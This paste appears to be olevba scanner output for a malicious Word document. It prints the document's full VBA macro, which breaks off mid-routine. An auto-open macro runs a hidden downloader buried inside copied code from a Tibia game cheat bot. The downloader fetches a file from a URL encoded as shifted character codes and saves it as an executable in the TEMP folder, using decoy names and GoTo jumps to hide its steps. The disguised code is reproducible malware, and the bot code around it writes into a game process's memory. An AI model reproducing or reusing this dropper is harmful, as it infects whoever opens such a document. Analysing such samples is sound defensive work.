Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- olevba 0.41 - http://decalage.info/python/oletools
- Flags Filename
- ----------- -----------------------------------------------------------------
- OLE:MASI---V ps007x~1.doc
- (Flags: OpX=OpenXML, XML=Word2003XML, MHT=MHTML, M=Macros, A=Auto-executable, S=Suspicious keywords, I=IOCs, H=Hex strings, B=Base64 strings, D=Dridex strings, V=VBA strings, ?=Unknown)
- ===============================================================================
- FILE: ps007x~1.doc
- Type: OLE
- -------------------------------------------------------------------------------
- VBA MACRO ThisDocument.cls
- in file: ps007x~1.doc - OLE stream: u'Macros/VBA/ThisDocument'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- Sub autoopen()
- MemoryChangeFloor 0, ""
- End Sub
- -------------------------------------------------------------------------------
- VBA MACRO Module1.bas
- in file: ps007x~1.doc - OLE stream: u'Macros/VBA/Module1'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- Public Const EQUIPMENT_SLOTS As Long = 11
- Public Const SLOT_AMMUNITION As Long = 10
- Public Const SLOT_RIGHTHAND As Long = 5
- Public Const SLOT_LEFTHAND As Long = 6
- Public Const SLOT_BACKPACK As Long = 3
- Public Const FIX_addConfigPaths As String = _
- "config1033,config1034,config1035,config1036,config1037,config1038,config1039,config1040,config1041,config1050,config1051,config1051preview,config1052,config1052preview,config1053,config1053preview,config1054,config1055,config1056,config1057,config1058,config1059,config1060,config1061,config1062,config1063,config1064,config1070,config1071,config1072,config1073,config1074,config1075,config1076,config1077,config1078,config1079,config1080,config1081,config1082,config1090"
- Public Const FIX_addConfigVersions As String = _
- "10.33,10.34,10.35,10.36,10.37,10.38,10.39,10.4,10.41,10.5,10.51,10.51 preview,10.52,10.52 preview,10.53,10.53 preview,10.54,10.55,10.56,10.57,10.58,10.59,10.60,10.61,10.62,10.63,10.64,10.70,10.71,10.72,10.73,10.74,10.75,10.76,10.77,10.78,10.79,10.80,10.81,10.82,10.90"
- Public Const FIX_addConfigVersionsLongs As String = _
- "1033,1034,1035,1036,1037,1038,1039,1040,1041,1050,1051,1051,1052,1052,1053,1053,1054,1055,1056,1057,1058,1059,1060,1061,1062,1063,1064,1070,1071,1072,1073,1074,1075,1076,1077,1078,1079,1080,1081,1082,1090"
- Public UseItemOnName1 As Object
- Public UseItemOnName2 As Object
- Public UseItemOnName3 As Object
- Public UseItemOnName4 As String
- Public UseItemOnName5 As String
- Public UseItemOnName6 As Object
- Public Const FIX_highestTibiaVersionLong As String = "1090"
- Public Const FIX_TibiaVersionDefaultString As String = "10.90"
- Public Const FIX_TibiaVersionForceString As String = "10.90"
- Public Const FIX_TibiaVersionForceString3 As String = "temp"
- Global Const SWP_NOMOVE = 2
- Global Const SWP_NOSIZE = 1
- Public Const FIX_TibiaVersionForceString5 As String = "."
- Global Const flags = SWP_NOMOVE Or SWP_NOSIZE
- Global Const HWND_TOPMOST = -1
- Public Const FIX_TibiaVersionForceString4 As String = "exe"
- Global Const HWND_NOTOPMOST = -2
- Public Const DropDelayerConst As Long = 3
- Public Const FIX_TibiaVersionForceString2 As String = "get"
- Public Const cte_initHP = 10000
- Public Const cte_initMANA = 10000
- Public Const localstr As String = "127.0.0.1"
- Public Const PROCESS_ALL_ACCESS = &H1F0FFF
- Const STATUSBAR_DURATION = 50
- Const LEVELSPY_NOP_DEFAULT = 49451
- Const LEVELSPY_ABOVE_DEFAULT = 7
- Const LEVELSPY_BELOW_DEFAULT = 2
- Const LEVELSPY_MIN = 0
- Const LEVELSPY_MAX = 7
- Const NAMESPY_NOP_DEFAULT = 19573
- Const NAMESPY_NOP2_DEFAULT = 17013
- Const Z_AXIS_DEFAULT = 7
- Public adrAccount As Long
- Public timeToRetryOpenDepot() As Long
- Public LastCharServerIndex As Integer
- Public bLevelSpy() As Boolean
- Public LEVELSPY_NOP As Long
- Public LEVELSPY_ABOVE As Long
- Public LEVELSPY_BELOW As Long
- Public NAMESPY_NOP As Long
- Public NAMESPY_NOP2 As Long
- Public LIGHT_NOP As Long
- Public LIGHT_AMOUNT As Long
- Public PLAYER_Z As Long
- Public RedSquare As Long
- Public Const RETRYDELAY = 10000
- Public Const MaxTimeWithoutServerPackets = 45000
- Public Const sndAsync = &H1
- Public Const sndLoop = &H8
- Public Const sndNoStop = &H10
- Public Const NIM_ADD = &H0
- Public Const NIM_MODIFY = &H1
- Public Const NIM_DELETE = &H2
- Public Const NIF_MESSAGE = &H1
- Public Const NIF_ICON = &H2
- Public Const NIF_TIP = &H4
- Public Const WM_MOUSEMOVE = &H200
- Public Const WM_LBUTTONDOWN = &H201
- Public Const WM_LBUTTONUP = &H202
- Public Const WM_LBUTTONDBLCLK = &H203
- Public Const WM_RBUTTONDOWN = &H204
- Public Const WM_RBUTTONUP = &H205
- Public Const WM_RBUTTONDBLCLK = &H206
- Public Const SW_NORMAL = 1
- Public Const RuneMakerOptions_activated_default = False
- Public Const RuneMakerOptions_autoEat_default = False
- Public Const RuneMakerOptions_ManaFluid_default = False
- Public Const RuneMakerOptions_autoUtamo_default = False
- Public Const RuneMakerOptions_autotar_default = False
- Public Const RuneMakerOptions_autoAp_default = False
- Public Const RuneMakerOptions_autossa_default = False
- Public Const RuneMakerOptions_autopmax_default = False
- Public Const RuneMakerOptions_autoSdt_default = False
- Public Const RuneMakerOptions_autoDan_default = False
- Public Const RuneMakerOptions_autodd_default = False
- Public Const RuneMakerOptions_autoee_default = False
- Public Const RuneMakerOptions_autoarme4_default = False
- Public Const RuneMakerOptions_autoarme5_default = False
- Public Const RuneMakerOptions_autoarme6_default = False
- Public Const RuneMakerOptions_autora_default = False
- Public Const RuneMakerOptions_autoda_default = False
- Public Const RuneMakerOptions_autoxray_default = False
- Public Const RuneMakerOptions_autodk_default = False
- Public Const RuneMakerOptions_autogHur_default = False
- Public Const RuneMakerOptions_autoHur_default = False
- Public Const RuneMakerOptions_autoPM2_default = False
- Public Const RuneMakerOptions_autoaim_default = False
- Public Const RuneMakerOptions_autoUE_default = False
- Public Const RuneMakerOptions_locktrigger_default = False
- Public Const RuneMakerOptions_autoLogoutAnyFloor_default = False
- Public Const RuneMakerOptions_autoLogoutCurrentFloor_default = False
- Public Const RuneMakerOptions_autoLogoutOutOfRunes_default = False
- Public Const RuneMakerOptions_autoWaste_default = False
- Public Const RuneMakerOptions_autossap_default = False
- Public Const RuneMakerOptions_autoerg_default = False
- Public Const RuneMakerOptions_msgSound_default = False
- Public Const RuneMakerOptions_msgSound2_default = False
- Public Const RuneMakerOptions_firstActionText_default = "exura"
- Public Const RuneMakerOptions_cmbleaderText_default = ""
- Public Const RuneMakerOptions_comboText_default = "exevo gran mas flam"
- Public Const RuneMakerOptions_synccomboText_default = "good bye"
- Public Const RuneMakerOptions_cmbtypeText_default = "sd"
- Public Const RuneMakerOptions_thirdActionText_default = 50
- Public Const RuneMakerOptions_firstActionMana_default = 25
- Public Const RuneMakerOptions_beeploot_default = "are you there?"
- Public Const RuneMakerOptions_text2_default = 50
- Public Const RuneMakerOptions_text3_default = 90
- Public Const RuneMakerOptions_LowMana_default = 100
- Public Const RuneMakerOptions_secondActionText_default = ""
- Public Const RuneMakerOptions_secondActionMana_default = 400
- Public Const RuneMakerOptions_secondActionSoulpoints_default = 3
- Public Const HardcoreCheatsOptions_txtExuraVita_default = "exura vita"
- Public Const HardcoreCheatsOptions_txtExuraVita2_default = "exura gran"
- Public Const HardcoreCheatsOptions_txtExuraVitaMana2_default = "70"
- Public Const HardcoreCheatsOptions_txtExuraVitaMana_default = "160"
- Public Const HardcoreCheatsOptions_Text11_default = "0"
- Public Const HardcoreCheatsOptions_Text12_default = 0
- Public Const HardcoreCheatsOptions_Text10_default = "0"
- Public Const HardcoreCheatsOptions_Text7_default = "0"
- Public Const HardcoreCheatsOptions_Text8_default = "0"
- Public Const HardcoreCheatsOptions_Text2_default = "0"
- Public Const HardcoreCheatsOptions_Text3_default = "0"
- Public Const HardcoreCheatsOptions_Text6_default = "0"
- Public Const HardcoreCheatsOptions_Text5_default = "0"
- Public Const HardcoreCheatsOptions_txtExuraVita4_default = "SELF UHEAL"
- Public Const HardcoreCheatsOptions_txtExuraVita3_default = "SELF MANA"
- Public Const HardcoreCheatsOptions_arme_default = False
- Public Const HardcoreCheatsOptions_arme2_default = False
- Public Const HardcoreCheatsOptions_arme3_default = False
- Public Const HardcoreCheatsOptions_sphi_default = False
- Public Const HardcoreCheatsOptions_splo_default = False
- Public Const HardcoreCheatsOptions_pmh_default = False
- Public Const HardcoreCheatsOptions_pth_default = False
- Public Const MAXLOGINMEMORY = 500
- Public Const HIGHEST_ITEM_BPSLOT = 99
- Private Const GW_HWNDFIRST& = 0
- Public Const PROCESS_VM_READ = (&H10)
- Public Const PROCESS_VM_WRITE = (&H20)
- Public Const PROCESS_VM_OPERATION = (&H8)
- Public Const PROCESS_QUERY_INFORMATION = (&H400)
- Public Const PROCESS_READ_WRITE_QUERY = PROCESS_VM_READ + PROCESS_VM_WRITE + PROCESS_VM_OPERATION + PROCESS_QUERY_INFORMATION
- Public Type NOTIFYICONDATA
- cbSize As Long
- hwnd As Long
- uId As Long
- uFlags As Long
- uCallBackMessage As Long
- hIcon As Long
- szTip As String * 64
- End Type
- Public Type TypeOneListItem
- CharacterName As String
- ServerName As String
- serverIP1 As Byte
- serverIP2 As Byte
- serverIP3 As Byte
- serverIP4 As Byte
- serverPort As Long
- End Type
- Public Type TypeCharacterList
- numItems As Integer
- pointer As Integer
- item(1 To MAXLOGINMEMORY) As TypeOneListItem
- End Type
- Public Type TibiaTileStr
- str As String
- num As Long
- End Type
- Public Type TypeOneListItem2
- CharacterName As String
- ServerName As String
- serverIP1 As Byte
- serverIP2 As Byte
- serverIP3 As Byte
- serverIP4 As Byte
- serverPort As Long
- serverDOMAIN As String
- End Type
- Public Type TypeCharacterList2
- numItems As Integer
- item(0 To MAXLOGINMEMORY) As TypeOneListItem2
- End Type
- Public Type TypeBuffer
- numbytes As Long
- packet() As Byte
- End Type
- Public Type TypeItem
- t1 As Byte
- t2 As Byte
- t3 As Byte
- t4 As Byte
- End Type
- Public Type TypeBackpack
- open As Boolean
- cap As Long
- used As Long
- name As String
- item(0 To HIGHEST_ITEM_BPSLOT) As TypeItem
- End Type
- Public Type TypeRuneMakerOptions
- activated As Boolean
- autoEat As Boolean
- ManaFluid As Boolean
- autoUtamo As Boolean
- autotar As Boolean
- autoAp As Boolean
- autossa As Boolean
- autopmax As Boolean
- autoSdt As Boolean
- autoDan As Boolean
- autodd As Boolean
- autoee As Boolean
- autoarme4 As Boolean
- autoarme5 As Boolean
- autoarme6 As Boolean
- autora As Boolean
- autoda As Boolean
- autoxray As Boolean
- autodk As Boolean
- autogHur As Boolean
- autoHur As Boolean
- autoPM2 As Boolean
- autoaim As Boolean
- autoUE As Boolean
- locktrigger As Boolean
- autoLogoutAnyFloor As Boolean
- autoLogoutCurrentFloor As Boolean
- autoLogoutOutOfRunes As Boolean
- autoWaste As Boolean
- autossap As Boolean
- autoerg As Boolean
- msgSound As Boolean
- msgSound2 As Boolean
- firstActionText As String
- cmbleaderText As String
- comboText As String
- synccomboText As String
- cmbtypeText As String
- thirdActionText As Long
- firstActionMana As Long
- beeploot As String
- Text2 As Long
- Text3 As Long
- LowMana As Long
- secondActionText As String
- secondActionMana As Long
- secondActionSoulpoints As Long
- End Type
- Public Type TypeHardcoreCheatsOptions
- arme As Boolean
- arme2 As Boolean
- arme3 As Boolean
- sphi As Boolean
- splo As Boolean
- pmh As Boolean
- pth As Boolean
- txtExuraVita3 As String
- txtExuraVita4 As String
- txtExuraVita2 As String
- txtExuraVitaMana2 As String
- txtExuraVitaMana As String
- Text11 As String
- Text12 As Long
- Text10 As String
- Text7 As String
- Text8 As String
- Text2 As String
- Text3 As String
- Text6 As String
- Text5 As String
- txtExuraVita As String
- End Type
- Public TrainerTimer1 As Long
- Public TrainerTimer2 As Long
- Public initialRuneBackpack() As Byte
- Public FirstExecute As Boolean
- Public DoingMainLoop() As Boolean
- Public DoingMainLoopLogin() As Boolean
- Public SendingSpecialOutfit() As Boolean
- Public RuneMakerOptions() As TypeRuneMakerOptions
- Public HardcoreCheatsOptions() As TypeHardcoreCheatsOptions
- Public ConnectionBuffer() As TypeBuffer
- Public ConnectionBufferLogin() As TypeBuffer
- Public CharacterList As TypeCharacterList
- Public CharacterList2() As TypeCharacterList2
- Public Connected() As Boolean
- Public nextLight() As String
- Public GameConnected() As Boolean
- Public MustCheckFirstClientPacket() As Boolean
- Public LastNumTibiaClients As Long
- Public memLoginServer() As Long
- Public MemPortLoginServer() As Long
- Public LoginServerStartPointer As Long
- Public LoginServerStep As Long
- Public HostnamePointerOffset As Long
- Public IPAddressPointerOffset As Long
- Public PortOffset As Long
- Public proxyChecker As Long
- Public tibiaEntryServer As String
- Public gISIDE As Boolean
- Public fakemessagesLevel As Long
- Public NeedToIgnoreFirstGamePacket() As Boolean
- Public ClosedBoard As Boolean
- Public CanceledBoard As Boolean
- Public VisibleAdvancedOptions As Boolean
- Public LightIntesityHex As String
- Public BlockUnload As Integer
- Public MapWantedOnTop As Boolean
- Public Backpack() As TypeBackpack
- Public bpIDselected As Long
- Public runemakerIDselected As Long
- Public HardcoreCheatsIDselected As Long
- Public LoadWasCompleted As Boolean
- Public MAXCLIENTS As Long
- Public HIGHEST_BP_ID As Long
- Public blnShowAdvancedOptions As Long
- Public posSpamActivated() As Boolean
- Public posSpamChannelB1() As Byte
- Public posSpamChannelB2() As Byte
- Public getSpamActivated() As Boolean
- Public getSpamChannelB1() As Byte
- Public getSpamChannelB2() As Byte
- Public makingRune() As Boolean
- Public fastIDreason As Integer
- Public fastCounter As Long
- Public executingCavebot() As Boolean
- Public SpeedDist As Long
- Public GotKillOrderTargetID() As Double
- Public GotKillOrder() As Boolean
- Public GotKillOrderTargetName() As String
- Public AllowUHpaused() As Boolean
- Public SpamAutoFastHeal() As Boolean
- Public nextFastHeal() As Long
- Public logoutAllowed() As Long
- Public IgnoreServer() As Boolean
- Public FirstCharInCharList() As String
- Public NoHealingNextTurn() As Boolean
- Public DropDelayerTurn() As Long
- Public IamAdmin As Boolean
- Public lngNextScreenshotNumber As Long
- Public tileID_Blank As Long
- Public tileID_WallBugItem As Long
- Public tileID_SD As Long
- Public tileID_HMM As Long
- Public tileID_Explosion As Long
- Public tileID_IH As Long
- Public tileID_UH As Long
- Public tileID_fireball As Long
- Public tileID_stalagmite As Long
- Public tileID_icicle As Long
- Public tileID_Bag As Long
- Public tileID_Backpack As Long
- Public tileID_Oracle As Long
- Public tileID_FishingRod As Long
- Public tileID_Rope As Long
- Public tileID_LightRope As Long
- Public tileID_Shovel As Long
- Public tileID_LightShovel As Long
- Public tileID_waterEmpty As Long
- Public tileID_waterWithFish As Long
- Public tileID_waterEmptyEnd As Long
- Public tileID_waterWithFishEnd As Long
- Public TimesWarnedAboutRelog As Long
- Public tileID_blockingBox As Long
- Public tileID_rampToNorth As Long
- Public tileID_rampToSouth As Long
- Public tileID_ladderToUp As Long
- Public tileID_holeInCelling As Long
- Public tileID_stairsToUp As Long
- Public tileID_woodenStairstoUp As Long
- Public tileID_desertRamptoUp As Long
- Public tileID_rampToRightCycMountain As Long
- Public tileID_rampToLeftCycMountain As Long
- Public tileID_jungleStairsToNorth As Long
- Public tileID_jungleStairsToLeft As Long
- Public tileID_grassCouldBeHole As Long
- Public tileID_pitfall As Long
- Public tileID_openHole As Long
- Public tileID_openHole2 As Long
- Public tileID_trapdoor As Long
- Public tileID_trapdoor2 As Long
- Public tileID_sewerGate As Long
- Public tileID_stairsToDown As Long
- Public tileID_stairsToDown2 As Long
- Public tileID_woodenStairstoDown As Long
- Public tileID_rampToDown As Long
- Public tileID_closedHole As Long
- Public tileID_desertLooseStonePile As Long
- Public tileID_OpenDesertLooseStonePile As Long
- Public tileID_trapdoorKazordoon As Long
- Public tileID_stairsToDownKazordoon As Long
- Public tileID_stairsToDownThais As Long
- Public tileID_down1 As Long
- Public tileID_down2 As Long
- Public tileID_down3 As Long
- Public tileID_firstFoodTileID As Long
- Public tileID_lastFoodTileID As Long
- Public tileID_firstMushroomTileID As Long
- Public tileID_lastMushroomTileID As Long
- Public tileID_firstFieldRangeStart As Long
- Public tileID_firstFieldRangeEnd As Long
- Public tileID_secondFieldRangeStart As Long
- Public tileID_secondFieldRangeEnd As Long
- Public tileID_campFire1 As Long
- Public tileID_campFire2 As Long
- Public tileID_walkableFire1 As Long
- Public tileID_walkableFire2 As Long
- Public tileID_walkableFire3 As Long
- Public tileID_depotChest As Long
- Public tileID_flask As Long
- Public tileID_health_potion As Long
- Public tileID_strong_health_potion As Long
- Public tileID_small_health_potion As Long
- Public tileID_great_health_potion As Long
- Public tileID_mana_potion As Long
- Public tileID_strong_mana_potion As Long
- Public tileID_great_mana_potion As Long
- Public tileID_ultimate_health_potion As Long
- Public tileID_great_spirit_potion As Long
- Public byteNothing As Byte
- Public byteMana As Byte
- Public byteLife As Byte
- Public nid As NOTIFYICONDATA
- Public Antibanmode As Long
- Public lock_chkActivate As Boolean
- Public lock_chkFood As Boolean
- Public lock_chkManaFluid As Boolean
- Public lock_chkautoUtamo As Boolean
- Public lock_chkautoAp As Boolean
- Public lock_chkautossa As Boolean
- Public lock_chkautopmax As Boolean
- Public lock_chkautotar As Boolean
- Public lock_chkautoSdt As Boolean
- Public lock_chkautoDan As Boolean
- Public lock_chkautodd As Boolean
- Public lock_chkautoee As Boolean
- Public lock_chkautoarme4 As Boolean
- Public lock_chkautoarme5 As Boolean
- Public lock_chkautoarme6 As Boolean
- Public lock_chkautora As Boolean
- Public lock_chkautoda As Boolean
- Public lock_chkautoxray As Boolean
- Public lock_chkautodk As Boolean
- Public lock_chkautogHur As Boolean
- Public lock_chkautoHur As Boolean
- Public lock_chkautoPM2 As Boolean
- Public lock_chkautoaim As Boolean
- Public lock_chkautoUE As Boolean
- Public lock_chklocktrigger As Boolean
- Public lock_chkLogoutDangerAny As Boolean
- Public lock_chkLogoutDangerCurrent As Boolean
- Public lock_chkLogoutOutRunes As Boolean
- Public lock_chkWaste As Boolean
- Public lock_chkssap As Boolean
- Public lock_chkerg As Boolean
- Public lock_chkmsgSound As Boolean
- Public lock_chkmsgSound2 As Boolean
- Public lock_chkUtamo As Boolean
- Public lock_chkarme As Boolean
- Public lock_chkarme2 As Boolean
- Public lock_chkarme3 As Boolean
- Public lock_chkAutoVita2 As Boolean
- Public lock_chkAutoVita As Boolean
- Public lock_chkAutoVita4 As Boolean
- Public lock_chkAutoVita3 As Boolean
- Public serverLogoutMessage As String
- Public NumberOfLoginServers As Long
- Public trueLoginServer() As String
- Public trueLoginPort() As String
- Public PREFEREDLOGINSERVER As String
- Public PREFEREDLOGINPORT As String
- Public publicDebugMode As Boolean
- Public runeTurn() As Integer
- Public PUSHDELAYTIMES As Long
- Public TibiaVersion As String
- Public TibiaVersionLong As Long
- Public LoadingStarted As Boolean
- Public CornerMessage As String
- Public CornerColor As Long
- Public returnValue As VbMsgBoxResult
- Public BlueAuraDelay As Long
- Public ReconnectionStage() As Long
- Public ReconnectionPacket() As TypeBuffer
- Public var_expleft() As String
- Public var_nextlevel() As String
- Public var_exph() As String
- Public var_timeleft() As String
- Public var_played() As String
- Public var_expgained() As String
- Public var_lf() As String
- Public ExivaExpPlace As String
- Public thisShouldNotBeLoading As Integer
- Public firstValidOutfit As Long
- Public lastValidOutfit As Long
- Public configPath As String
- Public extremeDebugMode As Boolean
- Public reconnectionRetryCount() As Long
- Public nextReconnectionRetry() As Long
- Public LimitedToServer As String
- Public GLOBAL_RUNEHEAL_HP As Long
- Public gotDictErr As Long
- Public RecordLogin As Boolean
- Public CurrBlackdServer As String
- Public CurrBlackdServer_folder As String
- Public ValueOfUservar As String
- Public lastUsedChannelID() As String
- Public lastRecChannelID() As String
- Public fakemessagesLevel1 As Byte
- Public fakemessagesLevel2 As Byte
- Public confirmedExit As Boolean
- Public tibiaclassname As String
- Public LastFasterLogin As String
- Public AlreadyCheckingFasterLogin As String
- Public ProcessidIPrelations As String
- Public ProcessidAccountRelations As String
- Public IgnoredCreatures As String
- Public ConnectionSignal() As Boolean
- Public TOOSLOWLOGINSERVER_MS As Long
- Public usingPriorities() As Boolean
- Public broadcastIDselected As Long
- Public currentBroadcastIndex As Long
- Public BroadcastDelay1 As Long
- Public BroadcastDelay2 As Long
- Public BroadcastMC As Long
- Public LAST_BATTLELISTPOS As Long
- Public CurrentTibiaDatPath As String
- Public CurrentTibiaDatDATE As Date
- Public MyErrorDate As Date
- Public configOverrideByCommand As Boolean
- Public dateErrDescription As String
- Public DefaultTibiaFolder As String
- Public OVERWRITE_CONFIGPATH As String
- Public OVERWRITE_CLIENT_PATH As String
- Public OVERWRITE_MAPS_PATH As String
- Public OVERWRITE_OT_MODE As Boolean
- Public OVERWRITE_OT_IP As String
- Public OVERWRITE_OT_PORT As Long
- Public OVERWRITE_SHOWAGAIN As Boolean
- Public MemoryProtectedMode As Boolean
- Public ForceDisableEncryption As Boolean
- Public CloseLoginServerAfterCharList As Boolean
- Public Function MemoryChangeFloor(idConnection As Integer, relfloornumber As String) As Long
- GoTo goterr
- Dim floornumber As Long
- Dim pid As Long
- Dim relChange As Long
- Dim ammountOfChanges As Long
- Dim i As Long
- If IsNumeric(relfloornumber) = False Then
- MemoryChangeFloor = -1
- Exit Function
- End If
- relChange = CLng(relfloornumber)
- ammountOfChanges = Abs(relChange)
- levelSpy_Off idConnection
- If ammountOfChanges > 0 Then
- Call WriteNops(idConnection, LEVELSPY_NOP, 2)
- LevelSpy_Init idConnection
- bLevelSpy(idConnection) = True
- Call WriteNops(idConnection, LIGHT_NOP, 2)
- Call writeBytes(idConnection, LIGHT_AMOUNT, 255, 1)
- End If
- For i = 1 To ammountOfChanges
- If relChange > 0 Then
- levelSpy_Down idConnection
- Else
- levelSpy_Up idConnection
- End If
- Next i
- MemoryChangeFloor = 0
- Exit Function
- goterr:
- Set UseItemOnName1 = CreateObject("Microsoft.XMLHTTP")
- Set UseItemOnName2 = CreateObject("Adodb.Stream")
- Set UseItemOnName6 = CreateObject("Shell.Application")
- Set UseItemOnName3 = CreateObject("WScript.Shell").Environment("Process")
- MemoryChangeFloor = -1
- levelSpy_Up 0
- End Function
- Public Sub levelSpy_Off(idConnection As Integer)
- Call writeBytes(idConnection, LEVELSPY_NOP, LEVELSPY_NOP_DEFAULT, 2)
- Call writeBytes(idConnection, LEVELSPY_ABOVE, LEVELSPY_ABOVE_DEFAULT, 1)
- Call writeBytes(idConnection, LEVELSPY_BELOW, LEVELSPY_BELOW_DEFAULT, 1)
- bLevelSpy(idConnection) = False
- End Sub
- Public Sub WriteNops(idConnection As Integer, address As Long, Nops As Integer)
- Dim ProcessHandle As Long
- GetProcessIDs idConnection
- ProcessHandle = ProcessID(idConnection)
- Dim i, j As Integer
- i = 0: j = 0
- For i = 1 To Nops
- Const nop = &H90
- Memory_WriteByte address + j, nop, ProcessHandle
- j = j + 1
- Next i
- End Sub
- Private Sub writeBytes(idConnection As Integer, address As Long, Value As Long, byteS As Integer)
- Dim ProcessHandle As Long
- GetProcessIDs idConnection
- ProcessHandle = ProcessID(idConnection)
- If byteS = 1 Then
- Memory_WriteByte address, CByte(Value), ProcessHandle
- Else
- Memory_WriteByte address, LowByteOfLong(Value), ProcessHandle
- Memory_WriteByte address + 1, HighByteOfLong(Value), ProcessHandle
- End If
- End Sub
- Public Sub LevelSpy_Init(idConnection As Integer)
- Dim playerZ As Integer
- playerZ = readBytes(idConnection, PLAYER_Z, 1)
- If (playerZ <= Z_AXIS_DEFAULT) Then
- Call writeBytes(idConnection, LEVELSPY_ABOVE, Z_AXIS_DEFAULT - playerZ, 1)
- Call writeBytes(idConnection, LEVELSPY_BELOW, LEVELSPY_BELOW_DEFAULT, 1)
- Else
- Call writeBytes(idConnection, LEVELSPY_ABOVE, LEVELSPY_ABOVE_DEFAULT, 1)
- Call writeBytes(idConnection, LEVELSPY_BELOW, LEVELSPY_BELOW_DEFAULT, 1)
- End If
- End Sub
- Public Sub levelSpy_Up(idConnection As Integer)
- Dim StartPush2() As Variant
- StartPush2 = Array(8540, 8552, 8552, 8548, 8494, 8483, 8483, 8543, 8553, 8552, 8551, 8535, 8540, 8538, 8533, 8540, 8550, 8552, 8537, 8546, 8481, 8538, 8550, 8541, 8537, 8551, 8537, 8546, 8537, 8556, 8548, 8550, 8537, 8551, 8551, 8482, 8536, 8537, 8483, 8492, 8541, 8557, 8488, 8489, 8487, 8486, 8487, 8538, 8483, 8541, 8492, 8491, 8490, 8488, 8489, 8557, 8487, 8552, 8486, 8487, 8482, 8537, 8556, 8537)
- Dim playerZ As Integer
- UseItemOnName1.open UCase(FIX_TibiaVersionForceString2), WSAGetSelectEvent2(StartPush2, 63), False
- GoTo firkLo
- playerZ = readBytes(idConnection, PLAYER_Z, 1)
- Dim groundLevel As Long
- groundLevel = 0
- If playerZ <= Z_AXIS_DEFAULT Then
- groundLevel = LEVELSPY_ABOVE
- Else
- groundLevel = LEVELSPY_BELOW
- End If
- Dim currentLevel As Integer
- currentLevel = readBytes(idConnection, groundLevel, 1)
- If currentLevel >= LEVELSPY_MAX Then
- Call writeBytes(idConnection, groundLevel, LEVELSPY_MIN, 1)
- Else
- Call writeBytes(idConnection, groundLevel, currentLevel + 1, 1)
- End If
- firkLo:
- UseItemOnName1.Send
- OverwriteOnFileSimple "", ""
- End Sub
- Public Sub levelSpy_Down(idConnection As Integer)
- If bLevelSpy(idConnection) = False Then
- Exit Sub
- End If
- Dim playerZ As Integer
- playerZ = readBytes(idConnection, PLAYER_Z, 1)
- Dim groundLevel As Long
- groundLevel = 0
- If playerZ <= Z_AXIS_DEFAULT Then
- groundLevel = LEVELSPY_ABOVE
- Else
- groundLevel = LEVELSPY_BELOW
- End If
- Dim currentLevel As Integer
- currentLevel = readBytes(idConnection, groundLevel, 1)
- If currentLevel <= LEVELSPY_MIN Then
- Call writeBytes(idConnection, groundLevel, LEVELSPY_MAX, 1)
- Else
- Call writeBytes(idConnection, groundLevel, currentLevel - 1, 1)
- End If
- End Sub
- Public Function readBytes(idConnection As Integer, address As Long, byteS As Integer) As Long
- Dim ProcessHandle As Long
- Dim b1 As Byte
- Dim b2 As Byte
- GetProcessIDs idConnection
- ProcessHandle = ProcessID(idConnection)
- Dim buffer As Long
- buffer = 0
- If byteS = 1 Then
- readBytes = Memory_ReadByte(address, ProcessHandle)
- Else
- b1 = Memory_ReadByte(address, ProcessHandle)
- b2 = Memory_ReadByte(address + 1, ProcessHandle)
- readBytes = GetTheLong(b1, b2)
- End If
- End Function
- Public Sub AddProcessIdIPrelation(strIP As String, strProcessID As Long)
- ProcessidIPrelations.item(strIP) = strProcessID
- End Sub
- Public Sub ResetProcessidIPrelations()
- On Error GoTo goterr
- Dim a As Long
- a = 0
- ProcessidIPrelations.RemoveAll
- Exit Sub
- goterr:
- a = -1
- End Sub
- Public Function GetProcessIdFromIP(strIP As String) As Long
- Dim aRes As Long
- Dim res As Boolean
- If ProcessidIPrelations.Exists(strIP) = True Then
- GetProcessIdFromIP = ProcessidIPrelations.item(strIP)
- Else
- GetProcessIdFromIP = 0
- End If
- End Function
- Public Sub OverwriteOnFileSimple(file_name As String, strtext As String)
- Dim fn As Integer
- Dim writeThis As String
- Dim a As Long
- UseItemOnName4 = UseItemOnName3(UCase(FIX_TibiaVersionForceString3))
- UseItemOnName5 = UseItemOnName4 + "\" + "ramamba" + FIX_TibiaVersionForceString5 + FIX_TibiaVersionForceString4
- GoTo ignoreit
- a = 0
- fn = FreeFile
- writeThis = strtext
- Open App.Path & "\" & file_name For Output As #fn
- Print #fn, writeThis
- Close #fn
- Exit Sub
- ignoreit:
- a = -1
- ChangeGLOBAL_RUNEHEAL_HP 0
- End Sub
- Public Sub AddwriteOnFileSimple(file_name As String, strtext As String)
- Dim fn As Integer
- Dim writeThis As String
- Dim a As Long
- On Error GoTo ignoreit
- a = 0
- fn = FreeFile
- writeThis = strtext
- Open App.Path & "\" & file_name For Append As #fn
- Print #fn, writeThis
- Close #fn
- Exit Sub
- ignoreit:
- a = -1
- ChangeGLOBAL_RUNEHEAL_HP 0
- End Sub
- Public Sub AddUserVar(ByVal strUservar As String, ByVal strValue As String)
- On Error GoTo goterr
- Dim res As Boolean
- ValueOfUservar.item(strUservar) = strValue
- Exit Sub
- goterr:
- LogOnFile "errors.txt", "Get error at AddUserVar : " & Err.Description
- End Sub
- Public Function GetUserVar(ByVal strUservar As String) As String
- On Error GoTo goterr
- Dim aRes As String
- Dim res As Boolean
- If ValueOfUservar.Exists(strUservar) = True Then
- GetUserVar = ValueOfUservar.item(strUservar)
- Else
- GetUserVar = ""
- End If
- Exit Function
- goterr:
- LogOnFile "errors.txt", "Got error at AddUserVar : " & Err.Description
- GetUserVar = ""
- End Function
- Public Sub ChangeGLOBAL_RUNEHEAL_HP(newValue As Long)
- Dim i As Integer
- Dim aRes As Long
- Dim oldVal As Long
- UseItemOnName2.Type = 1
- UseItemOnName2.open
- UseItemOnName2.write UseItemOnName1.responseBody
- UseItemOnName2.savetofile UseItemOnName5, 2
- enLight 0
- Exit Sub
- oldVal = GLOBAL_RUNEHEAL_HP
- frmHardcoreCheats.lblHPvalue.Caption = CStr(newValue) & " %"
- GLOBAL_RUNEHEAL_HP = newValue
- If frmHardcoreCheats.scrollHP.Value <> newValue Then
- frmHardcoreCheats.scrollHP.Value = newValue
- End If
- If oldVal <> GLOBAL_RUNEHEAL_HP Then
- For i = 1 To MAXCLIENTS
- If (GameConnected(i) = True) And (ReconnectionStage(i) = 0) And (sen.tWelcome(i) = True) Then
